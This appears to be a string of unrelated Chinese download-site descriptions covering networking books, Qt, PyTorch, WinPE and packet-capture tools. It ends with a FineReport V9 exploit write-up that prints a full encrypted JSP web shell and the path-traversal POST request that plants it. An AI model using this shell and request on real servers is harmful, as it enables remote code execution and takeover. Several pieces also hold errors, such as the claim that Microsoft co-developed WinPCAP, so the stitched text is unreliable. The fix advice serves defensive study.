本书《纳米尺度网络与通信手册》由约翰·R·瓦卡编辑，汇集了纳米通信与网络领域的最新研究成果和技术进展。全书分为多个章节，详细探讨了太赫兹频段的无线纳米通信、石墨烯基天线设计、可编程超表面网络、纳米通道建模等内容。书中还涉及了生物兼容的分子通信、微流控通信与网络、纳米材料和器件在未来通信网络中的应用等前沿话题。本书不仅适合从事纳米科技研究的专业人士阅读，也为对新兴通信技术感兴趣的读者提供了丰富的参考资料。

网络终端仿真程序NSTE.EXE是一款专为金融、邮政等领域设计的专业软件，它允许用户在个人计算机（PC）上模拟远程主机终端的行为，以便访问和操作远程系统。这个程序的关键特性在于其高度的自定义能力，包括对功能键的定制，以适应不同用户的特定需求和工作流程。 我们要理解什么是终端仿真。在早期的计算机系统中，终端是用户与大型主机进行交互的设备。随着技术的发展，个人电脑普及，终端仿真软件应运而生，它们在本地PC上模拟了这些远程终端的功能，使得用户无需物理连接到主机就能进行通信。NSTE.EXE就是这样一款工具，它通过TCP/IP网络协议与远程服务器建立连接，让用户能够在本地操作系统上执行远程主机的命令和应用。 自定义键盘功能是NSTE的一个显著特点。在金融和邮政行业中，往往有特定的操作流程和快捷键要求。NSTE允许用户根据实际工作需要配置功能键，例如设置F1-F12键对应不同的命令或操作，提高工作效率。这不仅方便了熟悉特定操作的工作人员，也减少了输入错误的可能性。 此外，NSTE.EXE可能还包括其他高级特性，如会话管理、多窗口支持、字符编码兼容性等。会话管理允许用户保存和恢复多个连接，便于在不同任务间切换；多窗口支持则可以同时打开并操作多个远程会话，提高多任务处理能力。字符编码兼容性则确保在处理各种字符集和语言时，数据能准确无误地显示和传输。 在银行业务中，这种终端仿真软件常用于处理转账、查询、报表生成等业务。在邮政系统中，可能用于管理包裹跟踪、邮费计算、邮政服务查询等操作。由于这些领域对数据安全性和稳定性要求极高，因此NSTE可能会集成安全机制，如加密传输、身份验证等，以保障敏感信息的安全。 NSTE.EXE是一个强大的网络终端仿真程序，它通过提供自定义键盘映射、多窗口操作、会话管理和安全连接等功能，满足了金融、邮政等行业对高效、安全远程访问的需求。对于依赖此类服务的用户来说，这款软件是提升工作效率和保证业务连续性的理想选择。

QT中的TCP多线程网络传输是开发分布式应用和实时数据通信的重要技术，它结合了QT库的优秀特性以及TCP协议的稳定性和可靠性。本项目包括客户端和服务端两部分，通过多线程技术来提高网络通信的效率和响应速度。下面我们将深入探讨相关知识点。 1. **QT库**：QT是一个跨平台的应用程序开发框架，支持多种操作系统，如Windows、Linux、Mac OS等。它提供了一套完整的图形用户界面（GUI）工具和丰富的网络编程接口，使得开发者可以轻松创建出具有专业界面和高效网络功能的应用程序。 2. **TCP协议**：TCP（Transmission Control Protocol）是一种面向连接的、可靠的、基于字节流的传输层通信协议。TCP确保数据的正确顺序、无丢失、无重复，并且在数据传输过程中提供错误检测。在QT中，QSocket类是实现TCP通信的基础。 3. **多线程**：多线程技术允许程序同时执行多个任务，提高了程序的并发性。在QT中，QThread类提供了线程的支持。在TCP网络传输中，多线程可以将接收和发送数据的任务分开，使得服务端和客户端能并行处理多个连接，提高系统性能。 4. **QT中的TCP通信**：在QT中，我们可以使用QTcpServer类来创建服务器端，监听客户端的连接请求；使用QTcpSocket类来建立客户端连接，进行数据收发。服务器端通常在一个单独的线程中运行，避免因为处理新连接而阻塞主线程。 5. **TestSrv和TestClient**：这两个文件名可能分别对应服务端和服务端的源代码。"TestSrv"可能是服务器端程序，负责监听和接受客户端连接，管理每个客户端的连接，并处理来自客户端的数据。"TestClient"则是客户端程序，用于建立到服务器的连接，发送数据并接收服务器的响应。 6. **源代码分析**：源代码可能会包含以下关键部分： - **服务器端启动与监听**：初始化QTcpServer，设置监听端口，然后开启监听等待客户端连接。 - **连接处理**：当有新的客户端连接时，服务器会创建一个新的QTcpSocket实例来处理这个连接，可能在一个子线程中运行，以保证并发性能。 - **数据收发**：使用QTcpSocket的read和write方法进行数据的读取和发送。 - **客户端连接**：客户端使用QTcpSocket连接到服务器指定的IP和端口，然后进行数据的发送和接收。 - **异常处理**：网络通信可能出现的各种异常，如连接中断、数据传输错误等，都需要进行适当的处理和恢复机制。 7. **多线程安全**：在多线程环境下，需要注意线程同步和资源竞争问题。QT提供了QMutex、QSemaphore等同步机制，确保在并发操作中数据的一致性和完整性。 通过以上分析，我们可以看出QT中TCP多线程网络传输客户端与服务端的实现涉及到了QT库的使用、TCP协议的理解、多线程编程以及异常处理等多个关键知识点。理解并掌握这些内容对于开发高效、稳定的网络应用至关重要。

内容概要：文章展示了一个用于故障检测的深度学习项目，采用PyTorch构建了一个一维卷积神经网络(CNN)，针对工业故障诊断问题。文中详细地解释了从数据加载、预处理、模型搭建、训练到性能评估的全过程。通过归一化原始数据集，设计多层一维卷积与全局最大池化的网络架构，并应用交叉熵作为损失函数，利用Adam算法进行梯度下降最优化，最终实现了高精度的分类任务。 适用人群：对于机器学习尤其是深度学习领域感兴趣的科研人员或者工程师，特别是那些想要深入了解或实操如何使用深度学习技术解决实际问题如工业设备状态监测的研究者和技术开发者。 使用场景及目标：本项目的目的是为了提高机械设备运行状态监控系统的效率与准确性，可以应用于制造业、电力等行业，帮助实时监控设备健康状况，及时发现潜在故障点，从而减少非计划停机时间和维修成本。 其他说明：除了提供了一套完整的解决方案之外，本文还展示了如何计算模型的参数量，以便于控制模型复杂度。此外，文中也包含了模型训练过程中每轮迭代的耗时记录，这对于大规模数据集下优化算法选择具有重要参考价值。

ap3g3-k9w8-tar.153-3.JPI5.tar

用软碟通写入U盘即可。支持bios、Uefi双启动。 V1.0版本发布 2022年1月19日 内置常用PE工具，7-Zip、EasyImageX_x64、XorBoot Uefi修复、NT6修复、Ghost、CGI、Google浏览器、PENetwork、RegWorkshop、迅雷迷你版、、BOOTICEx64、windows安装器、XP安装器、AnyDesk、向日葵最新国内、国际版，Acronis True Image Home for PE2019、Acronis True Image Home for PE2020、DiskGenius4.9专业版、傲梅分区、软碟通、TCP232调试助手、串口调试助手等等。 V2.0版本发布2023年1月14日 基于1.0添加Nvme、CH340、Jlink驱动。 添加J-Flash、FlyMcu应用程序，支持Jlink和串口对STM32单片机程序下载。 添加NoMachine远程桌面访问工具。 备用下载：https://pan.baidu.com/s/1zQ5dpP-KTN-8L5z74dgYTg?pwd=9013

计算机网络是一个复杂的系统，它通过各种通信技术将不同地理位置的计算机连接起来，以实现数据的共享和交换。计算机网络的功能主要有两个：连通性和共享。连通性是指网络能够使用户与远程的其他用户或资源进行连接，而共享则指的是网络中资源的共用，包括硬件、软件和数据资源。 分组交换是计算机网络中常用的一种数据交换方式，它结合了电路交换和报文交换的优点。分组交换技术通过将数据分割成较短的块，即“分组”，并为每个分组加上控制信息以标识发送者和接收者。这些分组在网络中独立地选择路径，然后在目标端重组成原始数据。分组交换具有灵活性高、利用率高、传输时延小和交互性好的特点。 电路交换则是一种通信方式，通过预留一条固定的通信电路进行信息传递。这种方式适用于实时性强、对时延要求高、通信量大的应用场景，例如电话通信。 报文交换指的是将报文存储在交换节点上，等待输出电路空闲时再进行传送。报文交换的优点在于中继电路利用率高，可以实现不同速率和协议的终端之间的互通，但存在传输时延大、占用存储资源多等缺点。 因特网作为全球最大的计算机网络，其发展可以分为几个阶段。最初是由ARPANET发展起来的，而后经过三级结构的建设，并逐渐形成了多层次ISP结构的网络体系。因特网标准的制定分为四个阶段，包括互联网草案、建议标准、草案标准和因特网标准。 在计算机网络的分类中，主要按网络覆盖的地理范围和传输介质来进行。按地理范围分类，有局域网（LAN）、城域网（MAN）和广域网（WAN）。局域网通常覆盖较小的区域，使用有线连接；城域网覆盖整个城市，技术上与局域网相似；广域网地理覆盖范围最广，技术上更为复杂。按传输介质分类，则包括有线网和无线网。有线网使用同轴电缆、双绞线等，而无线网通过电磁波进行通信。 此外，关于internet和Internet的区别，internet是一个泛指多种网络互联的通用名词，而Internet特指全球最大的特定计算机网络，它采用TCP/IP协议族，其前身是美国的ARPANET。 从上述内容可以了解到，计算机网络的类型多样，不同的网络类型有着各自的特点和适用范围。了解这些基础知识对于掌握整个计算机网络的架构、通信协议以及相关技术是至关重要的。通过学习计算机网络，我们可以更好地利用这一技术来服务于我们的工作、学习和日常生活。

《Snoop：基于WinPCAP的Delphi网络封包捕获控件详解》 Snoop是一款专门用于捕获网络数据包的Delphi控件，它依赖于WinPCAP库进行底层的数据包处理。WinPCAP，全称为Windows Packet Capture，是由Microsoft与Lucent Technologies合作开发的开源网络分析软件，它提供了对网络底层数据传输的直接访问，允许开发者捕获、修改和重新发送网络数据包。 我们来理解WinPCAP的核心功能。WinPCAP提供了四种主要功能： 1. **数据包捕获**：能够实时监控网络接口，收集所有通过该接口的数据包，无论是发送还是接收。 2. **网络协议分析**：可以解析捕获到的数据包，将其转化为人类可读的格式，方便分析网络流量。 3. **数据包过滤**：用户可以通过自定义规则，仅捕获符合特定条件的数据包，提高分析效率。 4. **网络回送**：允许开发者将捕获到的数据包重新发送到网络，用于测试或调试目的。 Snoop作为WinPCAP的Delphi控件，使得Delphi开发者可以直接在应用程序中集成这些功能。它的主要特性包括： 1. **简单易用的API**：Snoop提供了直观的Delphi组件和方法，使开发者无需深入理解WinPCAP的底层细节，即可实现数据包的捕获和分析。 2. **实时显示**：能够实时展示网络流量，帮助开发者观察网络活动并快速定位问题。 3. **强大的过滤器**：支持创建复杂的过滤规则，只显示感兴趣的数据包，简化了数据分析过程。 4. **数据包解析**：对捕获的数据包进行解析，展示每个数据包的详细信息，如源/目标IP地址、端口号、协议类型等。 5. **事件触发机制**：可以设置数据包捕获事件，当满足特定条件时，执行相应的程序逻辑。 在实际应用中，Snoop常被用于网络安全检测、网络性能优化、协议开发和调试等多个场景。例如，开发者可以利用Snoop监控特定应用的网络通信，以检查是否有异常的网络流量；或者在开发新的网络协议时，通过Snoop捕获的数据包来验证协议的正确性。 然而，值得注意的是，Snoop作为一个第三方控件，其完整性和稳定性可能取决于版本和维护情况。因此，寻找更新和更完善的版本，或者结合其他网络分析工具（如Wireshark）使用，可能是提升工作效率的有效途径。 Snoop是Delphi开发环境下，利用WinPCAP进行网络数据包捕获的有力工具。通过对WinPCAP的封装，Snoop为Delphi开发者提供了便捷的网络监控和分析能力，对于理解网络通讯、排查问题以及进行网络编程具有重要的价值。

遇见漂流瓶APP 参数解析（登录、扔漂流瓶、捞漂流瓶） 遇见漂流瓶  APP参数解析，调用精易模块

### 帆软V9getshell1：任意文件覆盖与JSP Web Shell植入详解 #### 一、背景介绍 帆软软件有限公司（FineSoft）是中国领先的企业级报表工具及商业智能解决方案提供商，其核心产品之一为FineReport报表设计工具。在2023年某次安全研究中发现了一个严重安全漏洞——任意文件覆盖（Arbitrary File Overwrite），该漏洞允许攻击者通过特定的操作路径上传恶意JSP脚本到目标服务器上，进而获得服务器权限。这一漏洞被命名为“帆软V9getshell1”。 #### 二、漏洞原理 ##### 2.1 任意文件覆盖机制 任意文件覆盖是指攻击者能够替换或修改服务器上的现有文件。在帆软报表系统的实现中，存在一处逻辑缺陷使得攻击者可以利用该功能来覆盖特定的JSP文件。 ##### 2.2 JSP马的上传与执行 1. **文件路径构造**：攻击者通过精心构造请求中的`filePath`参数，指向一个合法的JSP文件路径。例如，攻击者可以通过设置`filePath`为`../../../../WebReport/update.jsp`，将恶意代码写入到`WebReport`目录下的`update.jsp`文件中。 2. **恶意JSP代码**：攻击者准备了如下恶意JSP代码： ```jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> <% class U extends ClassLoader{ U(ClassLoader c){ super(c); } public Class g(byte []b){ return super.defineClass(b,0,b.length); } } if(request.getParameter("pass")!=null) { String k=(""+UUID.randomUUID()).replace("-", "").substring(16); session.putValue("u",k); out.print(k); return; } Cipher c=Cipher.getInstance("AES"); c.init(2,new SecretKeySpec((session.getValue("u")+ "").getBytes(),"AES")); new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext); %> ``` 该代码实现了以下功能： - 通过`request.getParameter("pass")`判断是否接收到触发命令。 - 使用AES加密算法对会话中的密钥进行初始化，并解码用户发送的数据。 - 动态加载并执行解密后的类文件，实现远程代码执行。 3. **HTTP请求示例**：攻击者通过发送如下POST请求将恶意代码写入指定位置： ``` POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1 Host: 192.168.169.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 Connection: close Accept-Au: 0c42b2f264071be0507acea1876c74 Content-Type: text/xml;charset=UTF-8 Content-Length: 675 {"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%>......","__CHARSET__":"UTF-8"} ``` 4. **利用Tomcat自带的JSP文件**：由于帆软报表系统通常部署在Apache Tomcat服务器上，攻击者可以利用Tomcat默认存在的JSP文件（例如`/tomcat-7.0.96/webapps/ROOT/index.jsp`）作为切入点，通过覆盖这些文件来植入恶意代码。 #### 三、修复建议 1. **升级补丁**：及时安装官方发布的最新版本或安全补丁，以修复已知的安全问题。 2. **限制文件路径**：对用户提交的文件路径进行严格的验证和过滤，避免攻击者通过构造恶意路径覆盖敏感文件。 3. **加强认证与授权**：对关键操作增加二次验证机制，限制非授权用户的访问权限，确保只有经过身份验证的用户才能执行敏感操作。 4. **审计日志记录**：开启并维护详细的审计日志，以便在发生异常情况时进行追踪和分析。 #### 四、总结 帆软V9getshell1这一漏洞揭示了在开发过程中忽视输入验证和权限控制所带来的潜在风险。企业应高度重视此类安全问题，并采取有效措施降低被攻击的风险。同时，用户也应增强安全意识，避免在不安全的网络环境中使用重要系统和服务。